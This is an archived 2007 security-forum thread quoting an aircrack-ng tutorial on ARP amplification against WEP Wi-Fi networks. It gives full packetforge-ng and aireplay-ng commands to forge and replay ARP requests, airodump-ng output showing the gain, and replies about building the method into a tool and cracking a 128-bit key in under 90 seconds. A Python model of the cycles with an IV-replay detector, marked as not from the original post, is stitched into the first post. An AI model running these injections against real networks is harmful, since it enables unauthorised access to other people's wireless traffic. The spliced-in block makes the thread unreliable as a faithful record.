Remote Exploit Forums

Tutorials & Guides
#1
06-14-2007, 10:18 PM
-=Xploitz=-
Senior Member

Join Date: Apr 2007
Location: Mesquite, Texas (Dallas County) USA
Posts: 3,487
Tutorial: The art of ARP amplification

DOUBLE OR TRIPLE YOUR PPS!!!!!! (DATA, IVS')


Code:
http://aircrack-ng.org/doku.php?id=arp_amplification

Please post your test results here!


"""QUOTED TEXT FROM ABOVE LINK"""


This is where things start to get interesting. By sending an ARP request to a live system, we can get the access point to generate two new IVs for each packet we inject. This increases the rate of data collection significantly.

This is a little harder than it sounds since we need to know an IP of a wired client attached to the LAN. As described in the introduction you can determine IPs via a variety of methods. So in the following I am using “192.168.1.1” as the destination IP. A critical item for success is to use “10.255.255.255” as the source IP. The source IP cannot be an IP already used in the LAN and it must be a valid network. You cannot use “255.255.255.255” like we do in many of our other examples.

We generate an ARP request to inject:

packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 -k 192.168.1.1 -l 10.255.255.255 -y fragment-0608-132715.xor -w arp-request-2x.cap

We inject the packet:

aireplay-ng -2 -r arp-request-2x.cap ath0

We measure the packets per second with airodump-ng:

CH  9 ][ Elapsed: 8 s ][ 2007-06-08 14:12

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:14:6C:7E:40:80   38 100      107    10474  945   9  54  WEP  WEP         teddy

 BSSID              STATION            PWR  Lost  Packets  Probes

 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   37     0    10921

As you can see above we achieve roughly 945 new data packets per second. This is a substantial increase over the first scenario.

Let's look at part of the capture. The arp-2x.cap is a representative subset of the full capture.

Use Wireshark to review the capture along with the following description. The easiest way is to use “View –> Expand”. Here is a description of the relevant packets:

* Packet 1: Your standard beacon.
* Packet 2: This is the packet we are injecting using aireplay-ng. Notice the DS Status flag is set to “TO DS” meaning from a wireless client going to the AP wired network.
* Packet 3: The AP acknowledges the packet from the Aircrack-ng system.
* Packet 4: The ARP request packet is broadcast by the AP. This is a new data packet. You will notice that it has a new unique IV and a different sequence number. Notice the DS Status flag is set to “FROM DS” meaning from the wired network (AP) to a wireless client.
* Packet 5: This is the ARP reply packet broadcast by the AP back to our system. This is a new data packet. You will notice that it has a new unique IV and a different sequence number. The source MAC is a wired client. Notice the DS Status flag is set to “FROM DS” meaning from the wired network (AP) to a wireless client.
* Packets 6-9 are a repeat of the cycle 2-5 above. This cycle would be repeated constantly.

If you count, there were two new IVs generated per cycle - packets 4 and 5.

Scenario Three - Three for one ARP packets

The final scenario is where we generate three new IV data packets for every one that we inject. This scenario is the hardest one to perform successfully. However, when successful, it achieves the highest injection rate.

In this case we need to know an IP of a wireless client currently associated with the access point. As described in the introduction you can determine IPs via a variety of methods. So in the following I am using “192.168.1.89” as the destination IP. A critical item for success is to use “10.255.255.255” as the source IP. The source IP cannot be an IP already used in the LAN and it must be a valid network. You cannot use “255.255.255.255” like we do in many of our other examples.

We generate an ARP request to inject:

packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 -k 192.168.1.89 -l 10.255.255.255 -y fragment-0608-132715.xor -w arp-request-3x.cap

We inject the packet:

aireplay-ng -2 -r arp-request-3x.cap ath0

We measure the packets per second with airodump-ng:

CH  9 ][ Elapsed: 0 s ][ 2007-06-09 12:52

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:14:6C:7E:40:80   32 100       30     3797 1294   9  54  WEP  WEP         teddy

 BSSID              STATION            PWR  Lost  Packets  Probes

 00:14:6C:7E:40:80  00:0F:B5:AB:CB:9D   47     0     1342
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   33     0     2641

As you can see above we achieve roughly 1294 new data packets per second. Wow! This is also a substantial increase over the first scenario. In the airodump-ng screen shot above there are two clients: our attack system and the wireless client we are leveraging.

Let's look at part of the capture. The arp-3x.cap is a representative subset of the full capture.

Use Wireshark to review the capture along with the following description. The easiest way is to use “View –> Expand”. Here is a description of the relevant packets:

* Packet 1: Your standard beacon.
* Packet 2: This is the packet we are injecting using aireplay-ng. Notice the DS Status flag is set to “TO DS” meaning from a wireless client going to the AP wired network.
* Packet 3: The AP acknowledges the packet from the Aircrack-ng system.
* Packet 4: The ARP request packet is broadcast by the AP. This is a new data packet. You will notice that it has a new unique IV and a different sequence number. Notice the DS Status flag is set to “FROM DS” meaning from the wired network (AP) to a wireless client.
* Packet 5: This is the ARP reply packet being sent by the wireless client to the AP. This is a new data packet. You will notice that it has a new unique IV and a different sequence number. The source MAC is the wireless client. Notice the DS Status flag is set to “TO DS” meaning from a wireless client going to the AP wired network.
* Packet 6: The AP acknowledges the packet from the wireless client.
* Packet 7: The ARP request packet from the wireless client is sent to the Aircrack-ng system by the AP. You can verify this by looking at the source and destination MAC addresses. This is a new data packet. You will notice that it has a new unique IV and a different sequence number. Notice the DS Status flag is set to “FROM DS” meaning from the wired network (AP) to a wireless client.
* Packets 8-13 are a repeat of the cycle 2-7 above. This cycle would be repeated constantly.

If you count, there were three new IVs generated per cycle - packets 4, 5 and 7.

Last edited by -=Xploitz=-; 06-14-2007 at 11:27 PM.
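The two cycles quoted above (packets 2-5 of the first capture, packets 2-7 of the second) as a small Python model, added here as an example that is not from the original post, the aircrack-ng wiki or the aircrack-ng code. It does two things a defender cares about: it counts how many fresh IVs the access point and its clients emit per injected frame, reproducing the 2x and 3x figures from the captures, and it shows the check a wireless IDS can apply to spot the injection, namely one station resending a single WEP IV over and over, which a well-behaved WEP sender never does. The BSSID, injecting station and wireless client MACs are the ones from the airodump-ng screens; the wired client MAC, the replayed IV value and the frame builders are constructed assumptions for the example.

```python
"""Model of the WEP ARP-amplification cycles described in the quoted wiki text,
plus a WIDS-style check that flags the replayed frame by its repeated IV.
All frame sequences below are constructed for this example."""
from collections import Counter
from dataclasses import dataclass
from itertools import count
from typing import Optional

AP = "00:14:6C:7E:40:80"               # BSSID from the airodump-ng screens
ATTACKER = "00:0F:B5:88:AC:82"         # injecting station from the screens
WIRELESS_CLIENT = "00:0F:B5:AB:CB:9D"  # wireless client from scenario three
WIRED_CLIENT = "00:AA:BB:CC:DD:EE"     # constructed: wired host behind the AP
BROADCAST = "FF:FF:FF:FF:FF:FF"
REPLAY_IV = 0x0A0B0C                   # constructed: the one IV the replay keeps resending


@dataclass(frozen=True)
class Frame:
    transmitter: str      # address of the radio that put the frame on the air
    receiver: str
    to_ds: bool           # DS status flag: station -> AP
    from_ds: bool         # DS status flag: AP -> station
    iv: Optional[int]     # 24-bit WEP IV; None for ACKs, which carry no body


def fresh_ivs(start=1):
    """Distinct 24-bit IVs, the way a normal WEP sender issues them."""
    return (iv & 0xFFFFFF for iv in count(start))


def two_for_one(cycles, fresh_iv):
    """Packets 2-5 of the first capture: one injected frame, two AP-generated IVs."""
    frames = []
    for _ in range(cycles):
        frames.append(Frame(ATTACKER, AP, True, False, REPLAY_IV))        # 2: injected ARP request, same IV each time
        frames.append(Frame(AP, ATTACKER, False, False, None))            # 3: ACK
        frames.append(Frame(AP, BROADCAST, False, True, next(fresh_iv)))  # 4: AP rebroadcasts the request
        frames.append(Frame(AP, BROADCAST, False, True, next(fresh_iv)))  # 5: AP relays the wired client's reply
    return frames


def three_for_one(cycles, fresh_iv):
    """Packets 2-7 of the second capture: one injected frame, three new IVs."""
    frames = []
    for _ in range(cycles):
        frames.append(Frame(ATTACKER, AP, True, False, REPLAY_IV))              # 2: injected ARP request
        frames.append(Frame(AP, ATTACKER, False, False, None))                  # 3: ACK
        frames.append(Frame(AP, BROADCAST, False, True, next(fresh_iv)))        # 4: AP rebroadcasts the request
        frames.append(Frame(WIRELESS_CLIENT, AP, True, False, next(fresh_iv)))  # 5: wireless client answers
        frames.append(Frame(AP, WIRELESS_CLIENT, False, False, None))           # 6: ACK
        frames.append(Frame(AP, ATTACKER, False, True, next(fresh_iv)))         # 7: AP forwards the answer
    return frames


def new_ivs_per_injected(frames, injector=ATTACKER):
    """Distinct IVs emitted by everyone except the injector, per injected data frame."""
    injected = sum(1 for f in frames if f.transmitter == injector and f.iv is not None)
    new = {f.iv for f in frames if f.iv is not None and f.transmitter != injector}
    return len(new) / injected


def flag_iv_replay(frames, threshold=20):
    """Stations that transmitted one IV at least `threshold` times.
    Legitimate WEP senders cycle their IVs, so a single IV repeated hundreds
    of times from one station is the signature of a replayed frame."""
    counts = Counter((f.transmitter, f.iv) for f in frames if f.iv is not None)
    return {tx: iv for (tx, iv), n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for name, build in (("two-for-one", two_for_one), ("three-for-one", three_for_one)):
        frames = build(100, fresh_ivs())
        print(name, "new IVs per injected frame:", new_ivs_per_injected(frames))
        print(name, "stations replaying an IV:", flag_iv_replay(frames))
```

The ratio function deliberately counts distinct IVs rather than frames, so the replayed frame itself never inflates the figure; the replay check keys on the transmitter address, which is why the AP's relayed frames, each carrying a fresh IV, are never flagged while the station that resends one IV is.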
#2
06-15-2007, 07:40 PM
Senior Member

Join Date: Mar 2007
Posts: 342

Seems simple enough, thanks for the tut, Xploitz.
Will post some results when I get a chance.
#3
06-15-2007, 10:48 PM
pureh@te
Jenkem Addict

Join Date: Mar 2007
Location: /dev/null
Posts: 5,401

So all that packet forging I was doing is gonna come in handy testing this.
#4
06-15-2007, 10:51 PM
shamanvirtuel
Senior Member

Join Date: May 2007
Location: In The EX-"Human Rights Country", the land of cheese and wine.....
Posts: 2,969

I'm trying to implement this in my new tool too.....

But I can't decide which method for getting client IPs I will use....
Any advice?

Could be really cool to have A.I.R injecting at 1200 pps..........

Thx a lot Xploitz
#5
06-15-2007, 10:55 PM
pureh@te
Jenkem Addict

Join Date: Mar 2007
Location: /dev/null
Posts: 5,401

You should use nmap; it's incorporated into lots of tools: Nessus, Metasploit, nettools, wicrawl and a few others. Trinity even used it in the Matrix movie to find a machine.
#6
06-15-2007, 10:58 PM
-=Xploitz=-
Senior Member

Join Date: Apr 2007
Location: Mesquite, Texas (Dallas County) USA
Posts: 3,487

Quote:
Originally Posted by purehate
So all that packet forging I was doing is gonna come in handy testing this.
Told ya it wasn't a waste..although at the time it was VERY FUNNY!!!


Quote:
Originally Posted by shamanvirtuel
I'm trying to implement this in my new tool too.....

But I can't decide which method for getting client IPs I will use....
Any advice?

Could be really cool to have A.I.R injecting at 1200 pps..........

Thx a lot Xploitz
I haven't tested it out yet..and me and the aircrack forums aren't getting along. I was witch-hunted, and because of a thread of mine I posted trying to learn how to do FAKE MAC internet connecting..now I'm considered a "Black Hat Hacker"! Imagine that! ....Me, a freaking Black Hat Hacker!!!

Last edited by -=Xploitz=-; 09-04-2007 at 06:45 AM.
#7
06-15-2007, 11:13 PM
pureh@te
Jenkem Addict

Join Date: Mar 2007
Location: /dev/null
Posts: 5,401

You should have tried the netstumbler forums.


Seriously, that's kind of silly of them. I've never joined their forums because the one aircrack problem I had, I emailed Matt Bryne and he emailed me right back with the solution and said to email him any time with questions.
#8
06-16-2007, 12:37 AM
Member

Join Date: Jun 2006
Posts: 80

Actually Xploit, this is the method that consistently works for me no matter which type of router I am using. I'll try to use Wireshark afterwards and post the results.

I usually get about 1mil per 25-30 minutes when the signal is very strong. Great write-up.
#9
06-16-2007, 04:13 AM
-=Xploitz=-
Senior Member

Join Date: Apr 2007
Location: Mesquite, Texas (Dallas County) USA
Posts: 3,487

Quote:
Originally Posted by purehate
You should have tried the netstumbler forums.
Yea, at least THERE they would have taken me by the hand and walked me through all the steps personally. And I'd have been treated with great courtesy and respect, as well as having everything instantly explained in a clear and friendly manner as well.

Gotta love Mother's sarcasm

Quote:
Originally Posted by Mother

May I suggest the Netstumbler forums (http://www.netstumbler.org), where you will be treated with great courtesy and everything will be instantly explained in a clear and friendly manner.

Last edited by -=Xploitz=-; 06-16-2007 at 04:17 AM.
#10
08-04-2007, 02:21 PM
shamanvirtuel
Senior Member

Join Date: May 2007
Location: In The EX-"Human Rights Country", the land of cheese and wine.....
Posts: 2,969

Have you finally done something with ARP ampli, Xploitz?

The best results I have are not the best ones I see, but I think it depends on the cards.....I got max 750 (which doubles my average inj speed, which is 350....)
I manage to crack my 128 in less than 1 min 30 including the frag attack!!!

Here are the specs of the attack:
dest ip : ap ip
source ip : client ip
max inj rate : 1024 pps
card rate : 36 M (at 54 I get nothing at the aireplay-ng test....)

Here is the screen of airodump:

[airodump-ng screenshot not preserved in the archive]

Have a look at the running time compared to IVs.....

Thx Xploitz for pointing this method out to me; inclusion in AIR in progress.